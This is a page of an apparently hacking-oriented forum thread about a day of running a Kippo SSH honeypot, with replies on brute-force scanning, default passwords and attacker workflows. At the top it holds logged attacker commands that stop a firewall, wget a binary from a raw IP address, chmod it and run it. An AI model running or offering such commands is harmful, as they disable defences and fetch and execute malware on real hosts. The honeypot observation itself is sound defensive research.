439,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:52",\N,0,"SuSEfirewall2 stopreSuSEfirewall2 stop"
440,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:58",\N,1,"cd /tmp"
441,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:04",\N,1,"wget -c http://117.21.176.79:333/l3600"
442,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:10",\N,1,"chmod 777 l3600"
443,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:56:16",\N,0,"./l3600"
Report to moderator   Logged

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #25 on: June 23, 2015, 10:06:27 pm »
Well thats a bunch of dirt.
Interesting stuff, do you also have the file that was uploaded ?
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline ColonelPanic

  • Serf
  • *
  • Posts: 27
  • Cookies: 7
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #26 on: June 24, 2015, 12:15:43 am »
This is rampant on hosted boxes (Hetzner, DigitalOcean, etc.) since they use known blocks of IP addresses. If I had to guess, I'd say the reason is either 1) skids playing with tools on default settings (or checking all the boxes), or 2) people targeting the one-click install images available on sites like DigitalOcean. e.g., hoping someone spun up a GitLab instance and forgot about it, or only used the web installer. With images like WordPress and such available, I'm sure it's pretty common.
Report to moderator   Logged

Offline xor

  • Peasant
  • *
  • Posts: 59
  • Cookies: 32
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #27 on: June 24, 2015, 03:16:02 am »
What you'll find is that most of the passwords listed, whilst appearing silly, will have been either a default password for some device that was released that you may not have even encountered yet, or a successful hit based on previous scans.


You'd be surprised how many SSH / Telnet servers still user default passwords like this.


-- xor
Report to moderator   Logged

Offline nozzlechunks

  • Serf
  • *
  • Posts: 22
  • Cookies: -3
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #28 on: June 24, 2015, 04:59:48 pm »
I don't have any of the files anymore, so who knows what they were pulling down. Probably bots and downloaders.

Yeah, I don't think these people are noobs. Lot of the stuff they do would work against an environment that was A) real, and 2) misconfigured. I'm guessing this is one of those operations where they scan for the low hanging stuff and then pass this off to the next team, to actually dig in to see what they got. If they get something interesting, they probably hand it off to a traversal team, etc.

If anyone has cool ideas for different experiments I could work on with Kippo and other honeypot tools, feel free to throw them out there or even PM me!
Report to moderator   Logged

Offline mr.sinister

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 0
    • View Profile
Re: 1 day of running a SSH honeypot
« Reply #29 on: July 27, 2015, 08:16:36 pm »
port 22 brute force attempts are pretty much a permanent thing on all if my servers :P
so i change the port and they dissapear :D
plus a permanent p0f logger captures the attempts on port that are not open.
Report to moderator   Logged
Pages: 1 [2] 3